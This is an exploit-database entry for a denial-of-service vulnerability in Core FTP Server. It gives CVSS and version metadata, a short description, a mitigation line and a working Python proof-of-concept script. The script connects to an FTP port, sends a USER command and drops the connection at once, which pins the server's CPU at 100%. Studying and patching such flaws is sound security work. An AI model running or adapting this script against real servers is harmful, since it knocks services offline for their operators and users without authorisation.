Core FTP Server Denial-of-Service Vulnerability

vendor:

Core FTP Server

by:

Mert Sarica

7.5

CVSS

HIGH

Denial-of-Service

400

CWE

Product Name: Core FTP Server

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: YES

Related CWE: None

CPE: a:coreftp:core_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2020

Core FTP Server Denial-of-Service Vulnerability

When a malicious user sends a 'USER test' packet and then kills the connection immediately, the CPU usage of the Core FTP Server increases to 100% and stays at that level until the FTP service is stopped.

Mitigation:

The Core FTP Server should be updated to the latest version to prevent this vulnerability.

Source

Exploit-DB raw data:

# Note: FTP account is not required for exploitation
# http://www.mertsarica.com
# I discovered a denial-of-service vulnerability on Core FTP Server product.
# When you send "USER test\r\n" and then kills the connection
# immediately, cpu increases to 100% and stays at that level until you
# stop the ftp service.


import socket, sys

HOST = 'localhost'    
PORT = 21             
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try: 
    s.connect((HOST, PORT))
except:
    print "Connection error"
    sys.exit(1)

try:
    s.send('USER MS\r\n') # magic packet
    s.close()
    print("Very good, young padawan, but you still have much to learn...")
except:
    print "Connection error"
    sys.exit(1)